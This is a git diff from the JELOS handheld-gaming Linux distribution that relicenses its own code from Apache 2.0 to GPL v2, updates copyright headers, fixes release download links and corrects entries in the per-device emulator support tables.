diff --git a/.github/workflows/build-dev.yaml b/.github/workflows/build-dev.yaml index 3c03ec190..6c912377f 100644 --- a/.github/workflows/build-dev.yaml +++ b/.github/workflows/build-dev.yaml @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present 351ELEC -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### Based on work by @pkegg diff --git a/.github/workflows/build-main.yaml b/.github/workflows/build-main.yaml index bfe777f90..fabd5606a 100644 --- a/.github/workflows/build-main.yaml +++ b/.github/workflows/build-main.yaml @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present 351ELEC -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### Based on work by @pkegg @@ -78,7 +78,7 @@ jobs: * ShareAlike — If you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original. ### JELOS Software - Copyright 2021-present Fewtarius + Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -104,8 +104,8 @@ jobs: |**Anbernic RG353P/M/V/VS, RG503, Powkiddy RK2023, RGB30**|[JELOS-RK3566.aarch64-${{ steps.version.outputs.version }}.img.gz](https://github.com/JustEnoughLinuxOS/distribution/releases/download/${{ steps.version.outputs.version }}/JELOS-RK3566.aarch64-${{ steps.version.outputs.version }}.img.gz)|[documentation](/documentation/PER_DEVICE_DOCUMENTATION/RK3566/)| |**Anbernic RG552**|[JELOS-RK3399.aarch64-${{ steps.version.outputs.version }}.img.gz](https://github.com/JustEnoughLinuxOS/distribution/releases/download/${{ steps.version.outputs.version }}/JELOS-RK3399.aarch64-${{ steps.version.outputs.version }}.img.gz)|[documentation](/documentation/PER_DEVICE_DOCUMENTATION/RK3399/)| |**Atari VCS, AOKZOE, Ayaneo, Ayn, GPD, and other x86_64 devices**|[JELOS-AMD64.x86_64-${{ steps.version.outputs.version }}.img.gz](https://github.com/JustEnoughLinuxOS/distribution/releases/download/${{ steps.version.outputs.version }}/JELOS-AMD64.x86_64-${{ steps.version.outputs.version }}.img.gz)|[documentation](/documentation/PER_DEVICE_DOCUMENTATION/AMD64/)| - |**Hardkernel ODROID Go Ultra, Powkiddy RGB10 Max 3 Pro**|[JELOS-S922X.aarch64-${{ steps.version.outputs.version }}-Odroid_GOU.img.gz](https://github.com/JustEnoughLinuxOS/distribution/releases/download/${{ steps.version.outputs.version }}/JELOS-S922X.aarch64-${{ steps.version.outputs.version }}.img.gz)|[documentation](/documentation/PER_DEVICE_DOCUMENTATION/S922X/)| - |**Hardkernel ODROID N2/N2+**|[JELOS-S922X.aarch64-${{ steps.version.outputs.version }}-Odroid_N2.img.gz](https://github.com/JustEnoughLinuxOS/distribution/releases/download/${{ steps.version.outputs.version }}/JELOS-S922X.aarch64-${{ steps.version.outputs.version }}.img.gz)|[documentation](/documentation/PER_DEVICE_DOCUMENTATION/S922X/)| + |**Hardkernel ODROID Go Ultra, Powkiddy RGB10 Max 3 Pro**|[JELOS-S922X.aarch64-${{ steps.version.outputs.version }}-Odroid_GOU.img.gz](https://github.com/JustEnoughLinuxOS/distribution/releases/download/${{ steps.version.outputs.version }}/JELOS-S922X.aarch64-${{ steps.version.outputs.version }}-Odroid_GOU.img.gz)|[documentation](/documentation/PER_DEVICE_DOCUMENTATION/S922X/)| + |**Hardkernel ODROID N2/N2+**|[JELOS-S922X.aarch64-${{ steps.version.outputs.version }}-Odroid_N2.img.gz](https://github.com/JustEnoughLinuxOS/distribution/releases/download/${{ steps.version.outputs.version }}/JELOS-S922X.aarch64-${{ steps.version.outputs.version }}.img.gz)-Odroid_N2.img|[documentation](/documentation/PER_DEVICE_DOCUMENTATION/S922X/)| |**Orange Pi 5, and Indiedroid Nova**|[JELOS-RK3588.aarch64-${{ steps.version.outputs.version }}.img.gz](https://github.com/JustEnoughLinuxOS/distribution/releases/download/${{ steps.version.outputs.version }}/JELOS-RK3588.aarch64-${{ steps.version.outputs.version }}.img.gz)|[documentation](/documentation/PER_DEVICE_DOCUMENTATION/RK3588/)| |**Powkiddy x55**|[JELOS-RK3566-X55.aarch64-${{ steps.version.outputs.version }}.img.gz](https://github.com/JustEnoughLinuxOS/distribution/releases/download/${{ steps.version.outputs.version }}/JELOS-RK3566-X55.aarch64-${{ steps.version.outputs.version }}.img.gz)|[documentation](/documentation/PER_DEVICE_DOCUMENTATION/RK3566-X55/)| diff --git a/.github/workflows/release-dev.yaml b/.github/workflows/release-dev.yaml index 7a17ccf12..425f200f9 100644 --- a/.github/workflows/release-dev.yaml +++ b/.github/workflows/release-dev.yaml @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present 351ELEC -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### Based on work by @pkegg diff --git a/.github/workflows/release-main.yaml b/.github/workflows/release-main.yaml index 26a8f822e..08bf6b422 100644 --- a/.github/workflows/release-main.yaml +++ b/.github/workflows/release-main.yaml @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present 351ELEC -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### Based on work by @pkegg diff --git a/LICENSE.md b/LICENSE.md index f27465063..e5474784d 100644 --- a/LICENSE.md +++ b/LICENSE.md @@ -2,34 +2,29 @@ # ## Licenses + JELOS is a Linux distribution that is made up of many open-source components. Components are provided under their respective licenses. This distribution includes components licensed for non-commercial use only. ### JELOS Branding + JELOS branding and images are licensed under a [Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License](https://creativecommons.org/licenses/by-nc-sa/4.0/). -#### You are free to -* Share — copy and redistribute the material in any medium or format -* Adapt — remix, transform, and build upon the material +You are free to: -#### Under the following terms -* Attribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use. -* NonCommercial — You may not use the material for commercial purposes. -* ShareAlike — If you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original. +- Share: copy and redistribute the material in any medium or format +- Adapt: remix, transform, and build upon the material + +Under the following terms: + +- Attribution: You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use. +- NonCommercial: You may not use the material for commercial purposes. +- ShareAlike: If you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original. ### JELOS Software -Copyright 2021-present Fewtarius -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at +Copyright 2023 JELOS (https://github.com/JustEnoughLinuxOS) -http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. +Original software and scripts developed by the JELOS team are licensed under the terms of the [GNU GPL Version 2](https://choosealicense.com/licenses/gpl-2.0/). The full license can be found in this project's licenses folder. ### Bundled Works -All other software is provided under each component's respective license. These licenses can be found in the software sources or in this project's licenses folder. +All other software is provided under each component's respective license. These licenses can be found in the software sources or in this project's licenses folder. Modifications to bundled software and scripts by the JELOS team are licensed under the terms of the software being modified. diff --git a/README.md b/README.md index ed90e5c91..566786136 100644 --- a/README.md +++ b/README.md @@ -55,14 +55,12 @@ Under the following terms: ### JELOS Software -Copyright 2021-present JELOS Project +Copyright 2023 JELOS (https://github.com/JustEnoughLinuxOS) -Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at [http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0) - -Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. +Original software and scripts developed by the JELOS team are licensed under the terms of the [GNU GPL Version 2](https://choosealicense.com/licenses/gpl-2.0/). The full license can be found in this project's licenses folder. ### Bundled Works -All other software is provided under each component's respective license. These licenses can be found in the software sources or in this project's licenses folder. +All other software is provided under each component's respective license. These licenses can be found in the software sources or in this project's licenses folder. Modifications to bundled software and scripts by the JELOS team are licensed under the terms of the software being modified. ## Documentation diff --git a/config/functions b/config/functions index db859268c..802d8e803 100644 --- a/config/functions +++ b/config/functions @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2018 Team LibreELEC (https://libreelec.tv) # Copyright (C) 2018-present Team CoreELEC (https://coreelec.org) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### FUNCTION HELPERS ### # die (message, code) abort with optional message and code diff --git a/documentation/PER_DEVICE_DOCUMENTATION/RK3326/SUPPORTED_EMULATORS_AND_CORES.md b/documentation/PER_DEVICE_DOCUMENTATION/RK3326/SUPPORTED_EMULATORS_AND_CORES.md index 73e7b66e3..266e3e1e8 100644 --- a/documentation/PER_DEVICE_DOCUMENTATION/RK3326/SUPPORTED_EMULATORS_AND_CORES.md +++ b/documentation/PER_DEVICE_DOCUMENTATION/RK3326/SUPPORTED_EMULATORS_AND_CORES.md @@ -14,7 +14,7 @@ This document describes all available systems emulators and cores available for | System|Tools (tools)|System|`modules`|.sh|| |Amstrad|CPC (amstradcpc)|1984|`amstradcpc`|.dsk .sna .tap .cdt .kcr .voc .m3u .zip .7z|**retroarch:** crocods (default)
**retroarch:** cap32
| |Arcade|Arcade (arcade)|1984|`arcade`|.zip .7z|**retroarch:** mame2003_plus (default)
**retroarch:** mame2000
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** fbneo
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
| -|Arcade|Daphne (daphne)|1996|`daphne`|.daphne .zip|**hypseus:** hypseus (default)
**retroarch:** daphne
| +|Arcade|Daphne (daphne)|1996|`daphne`|.daphne .singe|**hypseus-singe:** hypseus-singe (default)
**retroarch:** daphne
| |Arcade|Final Burn Neo (fbn)|1986|`fbneo`|.7z .zip|**retroarch:** fbneo (default)
**retroarch:** mame2003_plus
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** mame
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
| |Arcade|MAME (mame)|1948|`mame`|.7z .zip|**retroarch:** mame2003_plus (default)
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** mame
**retroarch:** fbneo
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
| |Arduboy|Arduboy (arduboy)|2014|`arduboy`|.hex|**retroarch:** arduous (default)
| @@ -50,7 +50,6 @@ This document describes all available systems emulators and cores available for |Microsoft|MS-DOS (pc)|1981|`pc`|.com .bat .exe .dosz|**retroarch:** dosbox_pure
**retroarch:** dosbox_svn
| |Microsoft|MSX (msx)|1983|`msx`|.dsk .mx1 .mx2 .rom .zip .7z .m3u|**retroarch:** bluemsx (default)
**retroarch:** fmsx
| |Microsoft|MSX 2 (msx2)|1988|`msx2`|.dsk .mx1 .mx2 .rom .zip .7z .m3u|**retroarch:** bluemsx (default)
**retroarch:** fmsx
| -|Milton Bradley|Vectrex (vectrex)|1982|`vectrex`|.bin .gam .vec .zip .7z|**retroarch:** vecx (default)
| |NEC|PC Engine (pcengine)|1987|`pcengine`|.pce .bin .zip .7z|**retroarch:** beetle_pce_fast (default)
**retroarch:** beetle_pce
**retroarch:** beetle_supergrafx
| |NEC|PC Engine CD (pcenginecd)|1988|`pcenginecd`|.cue .ccd .chd .toc .m3u|**retroarch:** beetle_pce_fast (default)
**retroarch:** beetle_pce
**retroarch:** beetle_supergrafx
| |NEC|PC-8800 (pc-8800)|1981|`pc88`|.d88 .m3u|**retroarch:** quasi88 (default)
| @@ -101,8 +100,9 @@ This document describes all available systems emulators and cores available for |Sharp|x68000 (x68000)|1987|`x68000`|.dim .img .d88d .hdm .dup .2hd .xdf .hdf .cmd .m3u .zip .7z|**retroarch:** px68k (default)
| |Sinclair|ZX Spectrum (zxspectrum)|1982|`zxspectrum`|.tzx .tap .z80 .rzx .scl .trd .dsk .zip .7z|**retroarch:** fuse
| |Sinclair|ZX81 (zx81)|1981|`zx81`|.tzx .p .zip .7z|**retroarch:** 81 (default)
| +|Smith Engineering|Vectrex (vectrex)|1982|`vectrex`|.bin .gam .vec .zip .7z|**retroarch:** vecx (default)
| |SNK|Neo Geo (neogeo)|1990|`neogeo`|.7z .zip|**retroarch:** fbneo (default)
**retroarch:** mame2003_plus
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** mame
| -|SNK|Neo Geo CD (neocd)|1990|`neocd`|.cue .iso .chd|**retroarch:** neocd (default)
**retroarch:** fbneo
| +|SNK|Neo Geo CD (neocd)|1994|`neocd`|.cue .iso .chd|**retroarch:** neocd (default)
**retroarch:** fbneo
| |SNK|Neo Geo Pocket (ngp)|1998|`ngp`|.ngc .ngp .zip .7z|**retroarch:** beetle_ngp (default)
**retroarch:** race
| |SNK|Neo Geo Pocket Color (ngpc)|1999|`ngpc`|.ngc .zip .7z|**retroarch:** beetle_ngp (default)
**retroarch:** race
| |Sony|PlayStation (psx)|1994|`psx`|.bin .cue .img .mdf .pbp .toc .cbn .m3u .ccd .chd .iso|**retroarch:** pcsx_rearmed32 (default)
**retroarch:** pcsx_rearmed
**duckstation:** duckstation-sa
**retroarch:** duckstation
**retroarch:** swanstation
| @@ -110,7 +110,7 @@ This document describes all available systems emulators and cores available for |Sony|PSP Minis (pspminis)|2004|`pspminis`|.iso .cso .pbp|**ppsspp:** ppsspp-sa (default)
**retroarch:** ppsspp
| |Sun Microsystems|J2ME (j2me)|2002|`j2me`|.jar|**retroarch:** freej2me (default)
| |Various|EasyRPG (easyrpg)|2003|`easyrpg`|.zip .easyrpg .ldb|**retroarch:** easyrpg (default)
| -|Various|OpenBOR (openbor)|2008|`openbor`|.pak|**OpenBOR:** OpenBOR (default)
| +|Various|OpenBOR (openbor)|2003|`openbor`|.pak|**OpenBOR:** OpenBOR (default)
| |Various|ScummVM (scummvm)|2001|`games`|.sh .svm .scummvm|**scummvmsa:** scummvm (default)
**retroarch:** scummvm
| |Watara|Supervision (supervision)|1992|`supervision`|.sv .zip .7z|**retroarch:** potator (default)
| |Welback Holdings|Mega Duck (megaduck)|1993|`megaduck`|.bin .zip .7z|**retroarch:** sameduck (default)
| diff --git a/documentation/PER_DEVICE_DOCUMENTATION/RK3399/SUPPORTED_EMULATORS_AND_CORES.md b/documentation/PER_DEVICE_DOCUMENTATION/RK3399/SUPPORTED_EMULATORS_AND_CORES.md index 6077af1fc..0e91d332b 100644 --- a/documentation/PER_DEVICE_DOCUMENTATION/RK3399/SUPPORTED_EMULATORS_AND_CORES.md +++ b/documentation/PER_DEVICE_DOCUMENTATION/RK3399/SUPPORTED_EMULATORS_AND_CORES.md @@ -14,7 +14,7 @@ This document describes all available systems emulators and cores available for | System|Tools (tools)|System|`modules`|.sh|| |Amstrad|CPC (amstradcpc)|1984|`amstradcpc`|.dsk .sna .tap .cdt .kcr .voc .m3u .zip .7z|**retroarch:** crocods (default)
**retroarch:** cap32
| |Arcade|Arcade (arcade)|1984|`arcade`|.zip .7z|**retroarch:** mame2003_plus (default)
**retroarch:** mame2000
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** fbneo
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
**retroarch:** mame
| -|Arcade|Daphne (daphne)|1996|`daphne`|.daphne .zip|**hypseus:** hypseus (default)
**retroarch:** daphne
| +|Arcade|Daphne (daphne)|1996|`daphne`|.daphne .singe|**hypseus-singe:** hypseus-singe (default)
**retroarch:** daphne
| |Arcade|Final Burn Neo (fbn)|1986|`fbneo`|.7z .zip|**retroarch:** fbneo (default)
**retroarch:** mame2003_plus
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** mame
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
| |Arcade|MAME (mame)|1948|`mame`|.7z .zip|**retroarch:** mame2003_plus (default)
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** mame
**retroarch:** fbneo
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
| |Arduboy|Arduboy (arduboy)|2014|`arduboy`|.hex|**retroarch:** arduous (default)
| @@ -50,7 +50,6 @@ This document describes all available systems emulators and cores available for |Microsoft|MS-DOS (pc)|1981|`pc`|.com .bat .exe .dosz|**retroarch:** dosbox_pure
**retroarch:** dosbox_svn
| |Microsoft|MSX (msx)|1983|`msx`|.dsk .mx1 .mx2 .rom .zip .7z .m3u|**retroarch:** bluemsx (default)
**retroarch:** fmsx
| |Microsoft|MSX 2 (msx2)|1988|`msx2`|.dsk .mx1 .mx2 .rom .zip .7z .m3u|**retroarch:** bluemsx (default)
**retroarch:** fmsx
| -|Milton Bradley|Vectrex (vectrex)|1982|`vectrex`|.bin .gam .vec .zip .7z|**retroarch:** vecx (default)
| |NEC|PC Engine (pcengine)|1987|`pcengine`|.pce .bin .zip .7z|**retroarch:** beetle_pce_fast (default)
**retroarch:** beetle_pce
**retroarch:** beetle_supergrafx
| |NEC|PC Engine CD (pcenginecd)|1988|`pcenginecd`|.cue .ccd .chd .toc .m3u|**retroarch:** beetle_pce_fast (default)
**retroarch:** beetle_pce
**retroarch:** beetle_supergrafx
| |NEC|PC-8800 (pc-8800)|1981|`pc88`|.d88 .m3u|**retroarch:** quasi88 (default)
| @@ -103,8 +102,9 @@ This document describes all available systems emulators and cores available for |Sharp|x68000 (x68000)|1987|`x68000`|.dim .img .d88d .hdm .dup .2hd .xdf .hdf .cmd .m3u .zip .7z|**retroarch:** px68k (default)
| |Sinclair|ZX Spectrum (zxspectrum)|1982|`zxspectrum`|.tzx .tap .z80 .rzx .scl .trd .dsk .zip .7z|**retroarch:** fuse
| |Sinclair|ZX81 (zx81)|1981|`zx81`|.tzx .p .zip .7z|**retroarch:** 81 (default)
| +|Smith Engineering|Vectrex (vectrex)|1982|`vectrex`|.bin .gam .vec .zip .7z|**retroarch:** vecx (default)
| |SNK|Neo Geo (neogeo)|1990|`neogeo`|.7z .zip|**retroarch:** fbneo (default)
**retroarch:** mame2003_plus
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** mame
| -|SNK|Neo Geo CD (neocd)|1990|`neocd`|.cue .iso .chd|**retroarch:** neocd (default)
**retroarch:** fbneo
| +|SNK|Neo Geo CD (neocd)|1994|`neocd`|.cue .iso .chd|**retroarch:** neocd (default)
**retroarch:** fbneo
| |SNK|Neo Geo Pocket (ngp)|1998|`ngp`|.ngc .ngp .zip .7z|**retroarch:** beetle_ngp (default)
**retroarch:** race
| |SNK|Neo Geo Pocket Color (ngpc)|1999|`ngpc`|.ngc .zip .7z|**retroarch:** beetle_ngp (default)
**retroarch:** race
| |Sony|PlayStation (psx)|1994|`psx`|.bin .cue .img .mdf .pbp .toc .cbn .m3u .ccd .chd .iso|**retroarch:** pcsx_rearmed32 (default)
**retroarch:** pcsx_rearmed
**retroarch:** beetle_psx
**duckstation:** duckstation-sa
**retroarch:** duckstation
**retroarch:** swanstation
| @@ -113,7 +113,7 @@ This document describes all available systems emulators and cores available for |Sony|PSP Minis (pspminis)|2004|`pspminis`|.iso .cso .pbp|**ppsspp:** ppsspp-sa (default)
**retroarch:** ppsspp
| |Sun Microsystems|J2ME (j2me)|2002|`j2me`|.jar|**retroarch:** freej2me (default)
| |Various|EasyRPG (easyrpg)|2003|`easyrpg`|.zip .easyrpg .ldb|**retroarch:** easyrpg (default)
| -|Various|OpenBOR (openbor)|2008|`openbor`|.pak|**OpenBOR:** OpenBOR (default)
| +|Various|OpenBOR (openbor)|2003|`openbor`|.pak|**OpenBOR:** OpenBOR (default)
| |Various|ScummVM (scummvm)|2001|`games`|.sh .svm .scummvm|**scummvmsa:** scummvm (default)
**retroarch:** scummvm
| |Watara|Supervision (supervision)|1992|`supervision`|.sv .zip .7z|**retroarch:** potator (default)
| |Welback Holdings|Mega Duck (megaduck)|1993|`megaduck`|.bin .zip .7z|**retroarch:** sameduck (default)
| diff --git a/documentation/PER_DEVICE_DOCUMENTATION/RK3566-X55/SUPPORTED_EMULATORS_AND_CORES.md b/documentation/PER_DEVICE_DOCUMENTATION/RK3566-X55/SUPPORTED_EMULATORS_AND_CORES.md index a4fef4059..2628688fb 100644 --- a/documentation/PER_DEVICE_DOCUMENTATION/RK3566-X55/SUPPORTED_EMULATORS_AND_CORES.md +++ b/documentation/PER_DEVICE_DOCUMENTATION/RK3566-X55/SUPPORTED_EMULATORS_AND_CORES.md @@ -14,7 +14,7 @@ This document describes all available systems emulators and cores available for | System|Tools (tools)|System|`modules`|.sh|| |Amstrad|CPC (amstradcpc)|1984|`amstradcpc`|.dsk .sna .tap .cdt .kcr .voc .m3u .zip .7z|**retroarch:** crocods (default)
**retroarch:** cap32
| |Arcade|Arcade (arcade)|1984|`arcade`|.zip .7z|**retroarch:** mame2003_plus (default)
**retroarch:** mame2000
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** fbneo
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
| -|Arcade|Daphne (daphne)|1996|`daphne`|.daphne .zip|**hypseus:** hypseus (default)
**retroarch:** daphne
| +|Arcade|Daphne (daphne)|1996|`daphne`|.daphne .singe|**hypseus-singe:** hypseus-singe (default)
**retroarch:** daphne
| |Arcade|Final Burn Neo (fbn)|1986|`fbneo`|.7z .zip|**retroarch:** fbneo (default)
**retroarch:** mame2003_plus
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** mame
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
| |Arcade|MAME (mame)|1948|`mame`|.7z .zip|**retroarch:** mame2003_plus (default)
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** mame
**retroarch:** fbneo
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
| |Arduboy|Arduboy (arduboy)|2014|`arduboy`|.hex|**retroarch:** arduous (default)
| @@ -50,7 +50,6 @@ This document describes all available systems emulators and cores available for |Microsoft|MS-DOS (pc)|1981|`pc`|.com .bat .exe .dosz|**retroarch:** dosbox_pure
**retroarch:** dosbox_svn
| |Microsoft|MSX (msx)|1983|`msx`|.dsk .mx1 .mx2 .rom .zip .7z .m3u|**retroarch:** bluemsx (default)
**retroarch:** fmsx
| |Microsoft|MSX 2 (msx2)|1988|`msx2`|.dsk .mx1 .mx2 .rom .zip .7z .m3u|**retroarch:** bluemsx (default)
**retroarch:** fmsx
| -|Milton Bradley|Vectrex (vectrex)|1982|`vectrex`|.bin .gam .vec .zip .7z|**retroarch:** vecx (default)
| |NEC|PC Engine (pcengine)|1987|`pcengine`|.pce .bin .zip .7z|**retroarch:** beetle_pce_fast (default)
**retroarch:** beetle_pce
**retroarch:** beetle_supergrafx
| |NEC|PC Engine CD (pcenginecd)|1988|`pcenginecd`|.cue .ccd .chd .toc .m3u|**retroarch:** beetle_pce_fast (default)
**retroarch:** beetle_pce
**retroarch:** beetle_supergrafx
| |NEC|PC-8800 (pc-8800)|1981|`pc88`|.d88 .m3u|**retroarch:** quasi88 (default)
| @@ -101,8 +100,9 @@ This document describes all available systems emulators and cores available for |Sharp|x68000 (x68000)|1987|`x68000`|.dim .img .d88d .hdm .dup .2hd .xdf .hdf .cmd .m3u .zip .7z|**retroarch:** px68k (default)
| |Sinclair|ZX Spectrum (zxspectrum)|1982|`zxspectrum`|.tzx .tap .z80 .rzx .scl .trd .dsk .zip .7z|**retroarch:** fuse
| |Sinclair|ZX81 (zx81)|1981|`zx81`|.tzx .p .zip .7z|**retroarch:** 81 (default)
| +|Smith Engineering|Vectrex (vectrex)|1982|`vectrex`|.bin .gam .vec .zip .7z|**retroarch:** vecx (default)
| |SNK|Neo Geo (neogeo)|1990|`neogeo`|.7z .zip|**retroarch:** fbneo (default)
**retroarch:** mame2003_plus
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** mame
| -|SNK|Neo Geo CD (neocd)|1990|`neocd`|.cue .iso .chd|**retroarch:** neocd (default)
**retroarch:** fbneo
| +|SNK|Neo Geo CD (neocd)|1994|`neocd`|.cue .iso .chd|**retroarch:** neocd (default)
**retroarch:** fbneo
| |SNK|Neo Geo Pocket (ngp)|1998|`ngp`|.ngc .ngp .zip .7z|**retroarch:** beetle_ngp (default)
**retroarch:** race
| |SNK|Neo Geo Pocket Color (ngpc)|1999|`ngpc`|.ngc .zip .7z|**retroarch:** beetle_ngp (default)
**retroarch:** race
| |Sony|PlayStation (psx)|1994|`psx`|.bin .cue .img .mdf .pbp .toc .cbn .m3u .ccd .chd .iso|**retroarch:** pcsx_rearmed32 (default)
**retroarch:** pcsx_rearmed
**duckstation:** duckstation-sa
**retroarch:** duckstation
**retroarch:** swanstation
| @@ -110,7 +110,7 @@ This document describes all available systems emulators and cores available for |Sony|PSP Minis (pspminis)|2004|`pspminis`|.iso .cso .pbp|**ppsspp:** ppsspp-sa (default)
**retroarch:** ppsspp
| |Sun Microsystems|J2ME (j2me)|2002|`j2me`|.jar|**retroarch:** freej2me (default)
| |Various|EasyRPG (easyrpg)|2003|`easyrpg`|.zip .easyrpg .ldb|**retroarch:** easyrpg (default)
| -|Various|OpenBOR (openbor)|2008|`openbor`|.pak|**OpenBOR:** OpenBOR (default)
| +|Various|OpenBOR (openbor)|2003|`openbor`|.pak|**OpenBOR:** OpenBOR (default)
| |Various|ScummVM (scummvm)|2001|`games`|.sh .svm .scummvm|**scummvmsa:** scummvm (default)
**retroarch:** scummvm
| |Watara|Supervision (supervision)|1992|`supervision`|.sv .zip .7z|**retroarch:** potator (default)
| |Welback Holdings|Mega Duck (megaduck)|1993|`megaduck`|.bin .zip .7z|**retroarch:** sameduck (default)
| diff --git a/documentation/PER_DEVICE_DOCUMENTATION/RK3588/SUPPORTED_EMULATORS_AND_CORES.md b/documentation/PER_DEVICE_DOCUMENTATION/RK3588/SUPPORTED_EMULATORS_AND_CORES.md index a223bc70a..3b9a8a51b 100644 --- a/documentation/PER_DEVICE_DOCUMENTATION/RK3588/SUPPORTED_EMULATORS_AND_CORES.md +++ b/documentation/PER_DEVICE_DOCUMENTATION/RK3588/SUPPORTED_EMULATORS_AND_CORES.md @@ -14,7 +14,7 @@ This document describes all available systems emulators and cores available for | System|Tools (tools)|System|`modules`|.sh|| |Amstrad|CPC (amstradcpc)|1984|`amstradcpc`|.dsk .sna .tap .cdt .kcr .voc .m3u .zip .7z|**retroarch:** crocods (default)
**retroarch:** cap32
| |Arcade|Arcade (arcade)|1984|`arcade`|.zip .7z|**retroarch:** mame2003_plus (default)
**retroarch:** mame2000
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** fbneo
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
**retroarch:** mame
| -|Arcade|Daphne (daphne)|1996|`daphne`|.daphne .zip|**hypseus:** hypseus (default)
**retroarch:** daphne
| +|Arcade|Daphne (daphne)|1996|`daphne`|.daphne .singe|**hypseus-singe:** hypseus-singe (default)
**retroarch:** daphne
| |Arcade|Final Burn Neo (fbn)|1986|`fbneo`|.7z .zip|**retroarch:** fbneo (default)
**retroarch:** mame2003_plus
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** mame
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
| |Arcade|MAME (mame)|1948|`mame`|.7z .zip|**retroarch:** mame2003_plus (default)
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** mame
**retroarch:** fbneo
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
| |Arduboy|Arduboy (arduboy)|2014|`arduboy`|.hex|**retroarch:** arduous (default)
| @@ -50,7 +50,6 @@ This document describes all available systems emulators and cores available for |Microsoft|MS-DOS (pc)|1981|`pc`|.com .bat .exe .dosz|**retroarch:** dosbox_pure
**retroarch:** dosbox_svn
| |Microsoft|MSX (msx)|1983|`msx`|.dsk .mx1 .mx2 .rom .zip .7z .m3u|**retroarch:** bluemsx (default)
**retroarch:** fmsx
| |Microsoft|MSX 2 (msx2)|1988|`msx2`|.dsk .mx1 .mx2 .rom .zip .7z .m3u|**retroarch:** bluemsx (default)
**retroarch:** fmsx
| -|Milton Bradley|Vectrex (vectrex)|1982|`vectrex`|.bin .gam .vec .zip .7z|**retroarch:** vecx (default)
| |NEC|PC Engine (pcengine)|1987|`pcengine`|.pce .bin .zip .7z|**retroarch:** beetle_pce_fast (default)
**retroarch:** beetle_pce
**retroarch:** beetle_supergrafx
| |NEC|PC Engine CD (pcenginecd)|1988|`pcenginecd`|.cue .ccd .chd .toc .m3u|**retroarch:** beetle_pce_fast (default)
**retroarch:** beetle_pce
**retroarch:** beetle_supergrafx
| |NEC|PC-8800 (pc-8800)|1981|`pc88`|.d88 .m3u|**retroarch:** quasi88 (default)
| @@ -103,8 +102,9 @@ This document describes all available systems emulators and cores available for |Sharp|x68000 (x68000)|1987|`x68000`|.dim .img .d88d .hdm .dup .2hd .xdf .hdf .cmd .m3u .zip .7z|**retroarch:** px68k (default)
| |Sinclair|ZX Spectrum (zxspectrum)|1982|`zxspectrum`|.tzx .tap .z80 .rzx .scl .trd .dsk .zip .7z|**retroarch:** fuse
| |Sinclair|ZX81 (zx81)|1981|`zx81`|.tzx .p .zip .7z|**retroarch:** 81 (default)
